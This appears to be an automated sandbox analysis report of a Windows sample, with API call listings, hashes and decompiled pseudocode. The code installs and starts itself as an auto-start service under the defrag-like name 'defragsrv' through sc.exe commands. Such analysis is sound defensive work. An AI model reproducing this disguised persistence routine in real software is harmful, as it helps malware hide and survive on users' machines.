                                                                    • Opcode Fuzzy Hash: 60610d436054d0c16c1d17b3a5aeba8199c409547a6be2d57b69509216d7ae87
                                                                    • Instruction Fuzzy Hash: 90114833201E09AEC62227B9EC82FEB239A9BC5778B742238F520B61E6DE61CC054110
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(000000FF,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00E6B372
                                                                    • WriteFile.KERNEL32(00000000,?,?,A6ABE2D4,00000000), ref: 00E6B38A
                                                                    • FlushFileBuffers.KERNEL32(00000000), ref: 00E6B391
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E6B398
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateFlushHandleWrite
                                                                    • String ID:
                                                                    • API String ID: 4137531733-0
                                                                    • Opcode ID: 7f8bfc9c82edf564d59fb2aeac30ad881fffc1d980383e200829a5dafe12cb67
                                                                    • Instruction ID: e5ea3ec5a913a675a8b18a3a3dc143a043988f19aee4ae91a07e4df21714d9a3
                                                                    • Opcode Fuzzy Hash: 7f8bfc9c82edf564d59fb2aeac30ad881fffc1d980383e200829a5dafe12cb67
                                                                    • Instruction Fuzzy Hash: CB118F31544258AFC710DF65DD49FDE7BB8EB09720F104229F921B72C0D7756A09CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,CCCCC369,147983CC,00000000,00000000,?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000), ref: 00EC3D5E
                                                                    • GetLastError.KERNEL32(?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000,00000000,00000000,?,00EB7ED7,?), ref: 00EC3D6A
                                                                      • Part of subcall function 00EC3D30: CloseHandle.KERNEL32(FFFFFFFE,00EC3D7A,?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000,00000000,00000000), ref: 00EC3D40
                                                                    • ___initconout.LIBCMT ref: 00EC3D7A
                                                                      • Part of subcall function 00EC3CED: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EC3D1C,00EC1DFA,00000000,?,00EB7983,00000000,?,00000000,00000000), ref: 00EC3D00
                                                                    • WriteConsoleW.KERNEL32(00000000,CCCCC369,147983CC,00000000,?,00EC1E0D,00000000,00000001,00000000,00000000,?,00EB7983,00000000,?,00000000,00000000), ref: 00EC3D8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: ceead691f3d03e3afdebb4ddeaef66c933ce7b4a79e952f6bbc4a862d7ac0eff
                                                                    • Instruction ID: 5c330a6675e7c2c796025a5e3b468d6db5a41babb7c6ec253e6bfb1d24cee53e
                                                                    • Opcode Fuzzy Hash: ceead691f3d03e3afdebb4ddeaef66c933ce7b4a79e952f6bbc4a862d7ac0eff
                                                                    • Instruction Fuzzy Hash: B7F01236501159BFCF221FE6DC08E8D7F66FB85360F048025F909A5130C6338D219B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,00EA7DAF,00000064), ref: 00EA7E35
                                                                    • LeaveCriticalSection.KERNEL32(00F2B6C4,00000000,?,00EA7DAF,00000064,?,00E6C0F0,00F2C318,00000004,00000000,00000000,00000000,?,A6ABE2D4,?,00EE45A8), ref: 00EA7E3F
                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,00EA7DAF,00000064,?,00E6C0F0,00F2C318,00000004,00000000,00000000,00000000,?,A6ABE2D4,?,00EE45A8), ref: 00EA7E50
                                                                    • EnterCriticalSection.KERNEL32(00F2B6C4,?,00EA7DAF,00000064,?,00E6C0F0,00F2C318,00000004,00000000,00000000,00000000,?,A6ABE2D4,?,00EE45A8), ref: 00EA7E57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID:
                                                                    • API String ID: 3269011525-0
                                                                    • Opcode ID: b996fe9b17d44e171979db7bb211bfa1c39d2f8d6f29737f793013abddbfbf90
                                                                    • Instruction ID: 58ef710a62f1ccb57108df38dc3a51aa5562ab1ba6630385e173baa32dcab282
                                                                    • Opcode Fuzzy Hash: b996fe9b17d44e171979db7bb211bfa1c39d2f8d6f29737f793013abddbfbf90
                                                                    • Instruction Fuzzy Hash: B6E01236546138BFC6115F55FC0CE997F29AF0AB55B0440B4FD0976170C7635D02ABD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E81C7B
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E81CDE
                                                                      • Part of subcall function 00EA6394: _Yarn.LIBCPMT ref: 00EA63B3
                                                                      • Part of subcall function 00EA6394: _Yarn.LIBCPMT ref: 00EA63D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 1908188788-1405518554
                                                                    • Opcode ID: 308c073612a77ff70b14e36afb8aea3728da9068e06d32bf17bf1497474dc5a2
                                                                    • Instruction ID: 1e1b19ff80be3f284a8ca8d4ef966abb244f9a2cc1aa7de4e00d232096b60cf3
                                                                    • Opcode Fuzzy Hash: 308c073612a77ff70b14e36afb8aea3728da9068e06d32bf17bf1497474dc5a2
                                                                    • Instruction Fuzzy Hash: B131D371904784EFD720CF68C900B8ABBE8EB19714F1486AEE455A7781D7B5AA04CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    C-Code - Quality: 84%
                                                                    			E00E583B0(void* __ebx, long __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                    				long _v8;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				short _v544;
                                                                    				struct _SECURITY_ATTRIBUTES* _v548;
                                                                    				struct _SECURITY_ATTRIBUTES* _v552;
                                                                    				intOrPtr _v556;
                                                                    				struct _SERVICE_TABLE_ENTRY _v560;
                                                                    				char _v568;
                                                                    				char _v572;
                                                                    				struct _SECURITY_ATTRIBUTES* _v576;
                                                                    				struct _SECURITY_ATTRIBUTES* _v580;
                                                                    				char _v596;
                                                                    				struct _SECURITY_ATTRIBUTES* _v600;
                                                                    				struct _SECURITY_ATTRIBUTES* _v604;
                                                                    				char _v620;
                                                                    				signed int _v624;
                                                                    				char _v648;
                                                                    				char _v672;
                                                                    				char _v696;
                                                                    				char _v720;
                                                                    				char _v744;
                                                                    				char _v768;
                                                                    				signed int _t262;
                                                                    				signed int _t263;
                                                                    				intOrPtr _t265;
                                                                    				int _t267;
                                                                    				void* _t274;
                                                                    				void* _t275;
                                                                    				void* _t276;
                                                                    				int _t279;
                                                                    				void* _t283;
                                                                    				intOrPtr* _t284;
                                                                    				signed int _t296;
                                                                    				int _t297;
                                                                    				void* _t300;
                                                                    				void* _t301;
                                                                    				void* _t302;
                                                                    				void* _t303;
                                                                    				void* _t306;
                                                                    				void* _t307;
                                                                    				intOrPtr* _t308;
                                                                    				void* _t317;
                                                                    				void* _t318;
                                                                    				void* _t319;
                                                                    				void* _t320;
                                                                    				void* _t323;
                                                                    				void* _t324;
                                                                    				intOrPtr* _t325;
                                                                    				void* _t339;
                                                                    				void* _t340;
                                                                    				void* _t341;
                                                                    				int _t344;
                                                                    				void* _t348;
                                                                    				intOrPtr* _t349;
                                                                    				int _t363;
                                                                    				void* _t367;
                                                                    				intOrPtr* _t368;
                                                                    				intOrPtr _t376;
                                                                    				void* _t378;
                                                                    				signed int _t383;
                                                                    				int _t386;
                                                                    				void* _t388;
                                                                    				intOrPtr _t394;
                                                                    				intOrPtr* _t406;
                                                                    				char* _t419;
                                                                    				signed int _t421;
                                                                    				signed int _t422;
                                                                    				struct HINSTANCE__* _t423;
                                                                    				intOrPtr* _t424;
                                                                    				intOrPtr* _t467;
                                                                    				intOrPtr* _t484;
                                                                    				intOrPtr* _t496;
                                                                    				void* _t509;
                                                                    				intOrPtr* _t512;
                                                                    				int _t513;
                                                                    				int _t525;
                                                                    				void* _t530;
                                                                    				void* _t534;
                                                                    				struct _SECURITY_ATTRIBUTES** _t543;
                                                                    				intOrPtr* _t548;
                                                                    				int _t549;
                                                                    				intOrPtr* _t550;
                                                                    				intOrPtr* _t551;
                                                                    				intOrPtr* _t552;
                                                                    				void* _t553;
                                                                    				void* _t555;
                                                                    				long _t556;
                                                                    				signed int _t560;
                                                                    				void* _t561;
                                                                    
                                                                    				_t541 = __edi;
                                                                    				_t558 = _t560;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xec4ba2);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t561 = _t560 - 0x2f0;
                                                                    				_t262 =  *0xeef074; // 0x2b749d79
                                                                    				_t263 = _t262 ^ _t560;
                                                                    				_v20 = _t263;
                                                                    				_push(__ebx);
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t263);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_t265 = _a4;
                                                                    				_t394 = _a8;
                                                                    				if(_t265 <= 1) {
                                                                    					_v560 = L"defragsrv";
                                                                    					_v556 = 0xe58e90;
                                                                    					_v552 = 0;
                                                                    					_v548 = 0;
                                                                    					_t267 = StartServiceCtrlDispatcherW( &_v560); // executed
                                                                    					__eflags = _t267;
                                                                    					if(_t267 == 0) {
                                                                    						GetModuleFileNameW(0,  &_v544, 0x105);
                                                                    						_v580 = 0;
                                                                    						_v576 = 0;
                                                                    						_v580 = 0;
                                                                    						_v576 = 7;
                                                                    						_v596 = 0;
                                                                    						L00E59930(_t394,  &_v596, __edi, __esi, L"create ", 7);
                                                                    						_v8 = 0x1f;
                                                                    						_t274 = E00E59140( &_v720,  &_v596, L"defragsrv");
                                                                    						_v8 = 0x20;
                                                                    						_t275 = E00E59140( &_v744, _t274, L" binpath= \"");
                                                                    						_v8 = 0x21;
                                                                    						_t276 = E00E59140( &_v768, _t275,  &_v544);
                                                                    						_v8 = 0x22;
                                                                    						_t548 = E00E59140( &_v648, _t276, L"\" start= auto");
                                                                    						_v8 = 0x23;
                                                                    						__eflags =  *((intOrPtr*)(_t548 + 0x14)) - 8;
                                                                    						if( *((intOrPtr*)(_t548 + 0x14)) >= 8) {
                                                                    							_t548 =  *_t548;
                                                                    						}
                                                                    						__eflags = 0;
                                                                    						_v604 = 0;
                                                                    						_t406 =  &_v544;
                                                                    						_v600 = 0;
                                                                    						_v604 = 0;
                                                                    						_t509 = _t406 + 2;
                                                                    						_v600 = 7;
                                                                    						_v620 = 0;
                                                                    						do {
                                                                    							_t279 =  *_t406;
                                                                    							_t406 = _t406 + 2;
                                                                    							__eflags = _t279;
                                                                    						} while (_t279 != 0);
                                                                    						L00E59930(_t394,  &_v620, _t541, _t548,  &_v544, _t406 - _t509 >> 1);
                                                                    						_v8 = 0x24;
                                                                    						_push(2);
                                                                    						_t283 = E00E59040(_t394,  &_v620,  &_v672, 0);
                                                                    						_v8 = 0x25;
                                                                    						_t284 = E00E59140( &_v696, _t283, L"\\windows\\system32\\sc.exe");
                                                                    						_v8 = 0x26;
                                                                    						__eflags =  *((intOrPtr*)(_t284 + 0x14)) - 8;
                                                                    						if( *((intOrPtr*)(_t284 + 0x14)) >= 8) {
                                                                    							_t284 =  *_t284;
                                                                    						}
                                                                    						_push(0);
                                                                    						_push(1);
                                                                    						_t511 = _t548;
                                                                    						E00E5A020(_t284, _t548, _t541, _t548);
                                                                    						_v8 = 0x25;
                                                                    						E00E59AF0(_t394,  &_v696, _t541);
                                                                    						_v8 = 0x24;
                                                                    						E00E59AF0(_t394,  &_v672, _t541);
                                                                    						_v8 = 0x23;
                                                                    						E00E59AF0(_t394,  &_v620, _t541);
                                                                    						_v8 = 0x22;
                                                                    						E00E59AF0(_t394,  &_v648, _t541);
                                                                    						_v8 = 0x21;
                                                                    						E00E59AF0(_t394,  &_v768, _t541);
                                                                    						_v8 = 0x20;
                                                                    						E00E59AF0(_t394,  &_v744, _t541);
                                                                    						_v8 = 0x1f;
                                                                    						_t419 =  &_v720;
                                                                    						goto L66;
                                                                    					}
                                                                    					goto L68;
                                                                    				} else {
                                                                    					if(_t265 <= 3) {
                                                                    						L10:
                                                                    						_t296 =  *(_t394 + 4);
                                                                    						_t511 = L"-r";
                                                                    						_t421 = _t296;
                                                                    						while(1) {
                                                                    							_t548 =  *_t421;
                                                                    							if(_t548 !=  *_t511) {
                                                                    								break;
                                                                    							}
                                                                    							if(_t548 == 0) {
                                                                    								L15:
                                                                    								_t420 = 0;
                                                                    							} else {
                                                                    								_t548 =  *((intOrPtr*)(2 + _t421));
                                                                    								_t39 = _t511 + 2; // 0x72
                                                                    								if(_t548 !=  *_t39) {
                                                                    									break;
                                                                    								} else {
                                                                    									_t421 = 4 + _t421;
                                                                    									_t511 = _t511 + 4;
                                                                    									if(_t548 != 0) {
                                                                    										continue;
                                                                    									} else {
                                                                    										goto L15;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							L17:
                                                                    							_t593 = _t420;
                                                                    							if(_t420 != 0) {
                                                                    								_t512 = L"-irs";
                                                                    								_t422 = _t296;
                                                                    								while(1) {
                                                                    									_t549 =  *_t422;
                                                                    									__eflags = _t549 -  *_t512;
                                                                    									if(_t549 !=  *_t512) {
                                                                    										break;
                                                                    									}
                                                                    									__eflags = _t549;
                                                                    									if(_t549 == 0) {
                                                                    										L24:
                                                                    										_t423 = 0;
                                                                    									} else {
                                                                    										_t549 =  *((intOrPtr*)(2 + _t422));
                                                                    										__eflags = _t549 -  *((intOrPtr*)(_t512 + 2));
                                                                    										if(_t549 !=  *((intOrPtr*)(_t512 + 2))) {
                                                                    											break;
                                                                    										} else {
                                                                    											_t422 = 4 + _t422;
                                                                    											_t512 = _t512 + 4;
                                                                    											__eflags = _t549;
                                                                    											if(_t549 != 0) {
                                                                    												continue;
                                                                    											} else {
                                                                    												goto L24;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									L26:
                                                                    									__eflags = _t423;
                                                                    									if(_t423 != 0) {
                                                                    										_t424 = L"-is";
                                                                    										while(1) {
                                                                    											_t513 =  *_t296;
                                                                    											__eflags = _t513 -  *_t424;
                                                                    											if(_t513 !=  *_t424) {
                                                                    												break;
                                                                    											}
                                                                    											__eflags = _t513;
                                                                    											if(_t513 == 0) {
                                                                    												L45:
                                                                    												_t297 = 0;
                                                                    											} else {
                                                                    												_t525 =  *((intOrPtr*)(2 + _t296));
                                                                    												__eflags = _t525 -  *((intOrPtr*)(_t424 + 2));
                                                                    												if(_t525 !=  *((intOrPtr*)(_t424 + 2))) {
                                                                    													break;
                                                                    												} else {
                                                                    													_t296 = 4 + _t296;
                                                                    													_t424 = _t424 + 4;
                                                                    													__eflags = _t525;
                                                                    													if(_t525 != 0) {
                                                                    														continue;
                                                                    													} else {
                                                                    														goto L45;
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											L47:
                                                                    											_push(0x105);
                                                                    											__eflags = _t297;
                                                                    											_push( &_v544);
                                                                    											_push(0);
                                                                    											if(_t297 != 0) {
                                                                    												GetModuleFileNameW();
                                                                    												_t300 = E00E590E0( &_v596, L"create ");
                                                                    												_v8 = 0x17;
                                                                    												_t301 = E00E59140( &_v620, _t300, L"defragsrv");
                                                                    												_v8 = 0x18;
                                                                    												_t302 = E00E59140( &_v720, _t301, L" binpath= \"");
                                                                    												_v8 = 0x19;
                                                                    												_t303 = E00E59140( &_v744, _t302,  &_v544);
                                                                    												_v8 = 0x1a;
                                                                    												_t548 = E00E59140( &_v768, _t303, L"\" start= auto");
                                                                    												_v8 = 0x1b;
                                                                    												__eflags =  *((intOrPtr*)(_t548 + 0x14)) - 8;
                                                                    												if( *((intOrPtr*)(_t548 + 0x14)) >= 8) {
                                                                    													_t548 =  *_t548;
                                                                    												}
                                                                    												_t306 = E00E590E0( &_v648,  &_v544);
                                                                    												_v8 = 0x1c;
                                                                    												_push(2);
                                                                    												_t307 = E00E59040(_t394, _t306,  &_v672, 0);
                                                                    												_v8 = 0x1d;
                                                                    												_t308 = E00E59140( &_v696, _t307, L"\\windows\\system32\\sc.exe");
                                                                    												_v8 = 0x1e;
                                                                    												__eflags =  *((intOrPtr*)(_t308 + 0x14)) - 8;
                                                                    												if( *((intOrPtr*)(_t308 + 0x14)) >= 8) {
                                                                    													_t308 =  *_t308;
                                                                    												}
                                                                    												_push(0);
                                                                    												_push(1);
                                                                    												_t511 = _t548;
                                                                    												E00E5A020(_t308, _t548, _t541, _t548);
                                                                    												_v8 = 0x1d;
                                                                    												E00E59AF0(_t394,  &_v696, _t541);
                                                                    												_v8 = 0x1c;
                                                                    												E00E59AF0(_t394,  &_v672, _t541);
                                                                    												_v8 = 0x1b;
                                                                    												E00E59AF0(_t394,  &_v648, _t541);
                                                                    												_v8 = 0x1a;
                                                                    												E00E59AF0(_t394,  &_v768, _t541);
                                                                    												_v8 = 0x19;
                                                                    												E00E59AF0(_t394,  &_v744, _t541);
                                                                    												_v8 = 0x18;
                                                                    												E00E59AF0(_t394,  &_v720, _t541);
                                                                    												_v8 = 0x17;
                                                                    												_t419 =  &_v620;
                                                                    												L66:
                                                                    												E00E59AF0(_t394, _t419, _t541);
                                                                    												_v8 = 0xffffffff;
                                                                    												_t420 =  &_v596;
                                                                    												E00E59AF0(_t394,  &_v596, _t541);
                                                                    												_push("running after 5 seconds, close proccess for cancelling");
                                                                    												E00E59A80();
                                                                    												Sleep(0x1388);
                                                                    												goto L67;
                                                                    											} else {
                                                                    												GetModuleFileNameW();
                                                                    												_t317 = E00E590E0( &_v596, L"create ");
                                                                    												_v8 = 0xf;
                                                                    												_t318 = E00E59140( &_v620, _t317, L"defragsrv");
                                                                    												_v8 = 0x10;
                                                                    												_t319 = E00E59140( &_v720, _t318, L" binpath= \"");
                                                                    												_v8 = 0x11;
                                                                    												_t320 = E00E59140( &_v744, _t319,  &_v544);
                                                                    												_v8 = 0x12;
                                                                    												_t550 = E00E59140( &_v768, _t320, L"\" start= auto");
                                                                    												_v8 = 0x13;
                                                                    												__eflags =  *((intOrPtr*)(_t550 + 0x14)) - 8;
                                                                    												if( *((intOrPtr*)(_t550 + 0x14)) >= 8) {
                                                                    													_t550 =  *_t550;
                                                                    												}
                                                                    												_t323 = E00E590E0( &_v648,  &_v544);
                                                                    												_v8 = 0x14;
                                                                    												_push(2);
                                                                    												_t324 = E00E59040(_t394, _t323,  &_v672, 0);
                                                                    												_v8 = 0x15;
                                                                    												_t325 = E00E59140( &_v696, _t324, L"\\windows\\system32\\sc.exe");
                                                                    												_v8 = 0x16;
                                                                    												__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 8;
                                                                    												if( *((intOrPtr*)(_t325 + 0x14)) >= 8) {
                                                                    													_t325 =  *_t325;
                                                                    												}
                                                                    												_push(0);
                                                                    												_push(1);
                                                                    												E00E5A020(_t325, _t550, _t541, _t550);
                                                                    												_v8 = 0x15;
                                                                    												E00E59AF0(_t394,  &_v696, _t541);
                                                                    												_v8 = 0x14;
                                                                    												E00E59AF0(_t394,  &_v672, _t541);
                                                                    												_v8 = 0x13;
                                                                    												E00E59AF0(_t394,  &_v648, _t541);
                                                                    												_v8 = 0x12;
                                                                    												E00E59AF0(_t394,  &_v768, _t541);
                                                                    												_v8 = 0x11;
                                                                    												E00E59AF0(_t394,  &_v744, _t541);
                                                                    												_v8 = 0x10;
                                                                    												E00E59AF0(_t394,  &_v720, _t541);
                                                                    												_v8 = 0xf;
                                                                    												E00E59AF0(_t394,  &_v620, _t541);
                                                                    												_v8 = 0xffffffff;
                                                                    												E00E59AF0(_t394,  &_v596, _t541);
                                                                    											}
                                                                    											goto L68;
                                                                    										}
                                                                    										asm("sbb eax, eax");
                                                                    										_t297 = _t296 | 0x00000001;
                                                                    										__eflags = _t297;
                                                                    										goto L47;
                                                                    									} else {
                                                                    										GetModuleFileNameW(_t423,  &_v544, 0x105);
                                                                    										_v580 = 0;
                                                                    										_v576 = 0;
                                                                    										_v580 = 0;
                                                                    										_v576 = 7;
                                                                    										_v596 = 0;
                                                                    										L00E59930(_t394,  &_v596, _t541, _t549, L"create ", 7);
                                                                    										_v8 = 2;
                                                                    										_t339 = E00E59140( &_v696,  &_v596, L"defragsrv");
                                                                    										_v8 = 3;
                                                                    										_t340 = E00E59140( &_v672, _t339, L" binpath= \"");
                                                                    										_v8 = 4;
                                                                    										_t341 = E00E59140( &_v648, _t340,  &_v544);
                                                                    										_v8 = 5;
                                                                    										_t551 = E00E59140( &_v768, _t341, L"\" start= auto");
                                                                    										_v8 = 6;
                                                                    										__eflags =  *((intOrPtr*)(_t551 + 0x14)) - 8;
                                                                    										if( *((intOrPtr*)(_t551 + 0x14)) >= 8) {
                                                                    											_t551 =  *_t551;
                                                                    										}
                                                                    										__eflags = 0;
                                                                    										_v552 = 0;
                                                                    										_t467 =  &_v544;
                                                                    										_v548 = 0;
                                                                    										_v552 = 0;
                                                                    										_t530 = _t467 + 2;
                                                                    										_v548 = 7;
                                                                    										_v568 = 0;
                                                                    										do {
                                                                    											_t344 =  *_t467;
                                                                    											_t467 = _t467 + 2;
                                                                    											__eflags = _t344;
                                                                    										} while (_t344 != 0);
                                                                    										L00E59930(_t394,  &_v568, _t541, _t551,  &_v544, _t467 - _t530 >> 1);
                                                                    										_v8 = 7;
                                                                    										_push(2);
                                                                    										_t348 = E00E59040(_t394,  &_v568,  &_v744, 0);
                                                                    										_v8 = 8;
                                                                    										_t349 = E00E59140( &_v720, _t348, L"\\windows\\system32\\sc.exe");
                                                                    										_v8 = 9;
                                                                    										__eflags =  *((intOrPtr*)(_t349 + 0x14)) - 8;
                                                                    										if( *((intOrPtr*)(_t349 + 0x14)) >= 8) {
                                                                    											_t349 =  *_t349;
                                                                    										}
                                                                    										_push(0);
                                                                    										_push(1);
                                                                    										E00E5A020(_t349, _t551, _t541, _t551);
                                                                    										_v8 = 8;
                                                                    										E00E59AF0(_t394,  &_v720, _t541);
                                                                    										_v8 = 7;
                                                                    										E00E59AF0(_t394,  &_v744, _t541);
                                                                    										_v8 = 6;
                                                                    										E00E59AF0(_t394,  &_v568, _t541);
                                                                    										_v8 = 5;
                                                                    										E00E59AF0(_t394,  &_v768, _t541);
                                                                    										_v8 = 4;
                                                                    										E00E59AF0(_t394,  &_v648, _t541);
                                                                    										_v8 = 3;
                                                                    										E00E59AF0(_t394,  &_v672, _t541);
                                                                    										_v8 = 2;
                                                                    										E00E59AF0(_t394,  &_v696, _t541);
                                                                    										_v8 = 0xffffffff;
                                                                    										E00E59AF0(_t394,  &_v596, _t541);
                                                                    										Sleep(0xbb8);
                                                                    										_v604 = 0;
                                                                    										_v600 = 0;
                                                                    										_v604 = 0;
                                                                    										_v600 = 7;
                                                                    										_v620 = 0;
                                                                    										L00E59930(_t394,  &_v620, _t541, _t551, L"start ", 6);
                                                                    										_v8 = 0xa;
                                                                    										_t552 = E00E59140( &_v648,  &_v620, L"defragsrv");
                                                                    										_v8 = 0xb;
                                                                    										__eflags =  *((intOrPtr*)(_t552 + 0x14)) - 8;
                                                                    										if( *((intOrPtr*)(_t552 + 0x14)) >= 8) {
                                                                    											_t552 =  *_t552;
                                                                    										}
                                                                    										__eflags = 0;
                                                                    										_v580 = 0;
                                                                    										_t484 =  &_v544;
                                                                    										_v576 = 0;
                                                                    										_v580 = 0;
                                                                    										_t534 = _t484 + 2;
                                                                    										_v576 = 7;
                                                                    										_v596 = 0;
                                                                    										do {
                                                                    											_t363 =  *_t484;
                                                                    											_t484 = _t484 + 2;
                                                                    											__eflags = _t363;
                                                                    										} while (_t363 != 0);
                                                                    										L00E59930(_t394,  &_v596, _t541, _t552,  &_v544, _t484 - _t534 >> 1);
                                                                    										_v8 = 0xc;
                                                                    										_push(2);
                                                                    										_t367 = E00E59040(_t394,  &_v596,  &_v672, 0);
                                                                    										_v8 = 0xd;
                                                                    										_t368 = E00E59140( &_v696, _t367, L"\\windows\\system32\\sc.exe");
                                                                    										_v8 = 0xe;
                                                                    										__eflags =  *((intOrPtr*)(_t368 + 0x14)) - 8;
                                                                    										if( *((intOrPtr*)(_t368 + 0x14)) >= 8) {
                                                                    											_t368 =  *_t368;
                                                                    										}
                                                                    										_push(0);
                                                                    										_push(1);
                                                                    										E00E5A020(_t368, _t552, _t541, _t552);
                                                                    										_v8 = 0xd;
                                                                    										E00E59AF0(_t394,  &_v696, _t541);
                                                                    										_v8 = 0xc;
                                                                    										E00E59AF0(_t394,  &_v672, _t541);
                                                                    										_v8 = 0xb;
                                                                    										E00E59AF0(_t394,  &_v596, _t541);
                                                                    										_v8 = 0xa;
                                                                    										E00E59AF0(_t394,  &_v648, _t541);
                                                                    										_v8 = 0xffffffff;
                                                                    										E00E59AF0(_t394,  &_v620, _t541);
                                                                    									}
                                                                    									goto L68;
                                                                    								}
                                                                    								asm("sbb ecx, ecx");
                                                                    								_t423 = _t422 | 0x00000001;
                                                                    								__eflags = _t423;
                                                                    								goto L26;
                                                                    							} else {
                                                                    								 *0xeef9d0 = _t420;
                                                                    								L67:
                                                                    								L00E5A420(_t394, _t420, _t511, _t541, _t548, _t593);
                                                                    							}
                                                                    							L68:
                                                                    							 *[fs:0x0] = _v16;
                                                                    							return E00EA7663(_v20 ^ _t558);
                                                                    							goto L78;
                                                                    						}
                                                                    						asm("sbb ecx, ecx");
                                                                    						_t420 = _t421 | 0x00000001;
                                                                    						__eflags = _t420;
                                                                    						goto L17;
                                                                    					} else {
                                                                    						_t537 =  *((intOrPtr*)(_t394 + 8));
                                                                    						_t496 =  *((intOrPtr*)(_t394 + 8));
                                                                    						_v552 = 0;
                                                                    						_v548 = 0;
                                                                    						_v552 = 0;
                                                                    						_v548 = 7;
                                                                    						_v568 = 0;
                                                                    						_t553 = _t496 + 2;
                                                                    						do {
                                                                    							_t376 =  *_t496;
                                                                    							_t496 = _t496 + 2;
                                                                    						} while (_t376 != 0);
                                                                    						L00E59930(_t394,  &_v568, __edi, _t553, _t537, _t496 - _t553 >> 1);
                                                                    						_v8 = 0;
                                                                    						_t501 =  >=  ? _v568 :  &_v568;
                                                                    						_t378 = E00E591D0( >=  ? _v568 :  &_v568, _v552,  >=  ? _v568 :  &_v568, L"-wait", 5);
                                                                    						_t561 = _t561 + 0xc;
                                                                    						_t583 = _t378 - 0xffffffff;
                                                                    						if(_t378 == 0xffffffff) {
                                                                    							L9:
                                                                    							_v8 = 0xffffffff;
                                                                    							E00E59AF0(_t394,  &_v568, _t541);
                                                                    							goto L10;
                                                                    						} else {
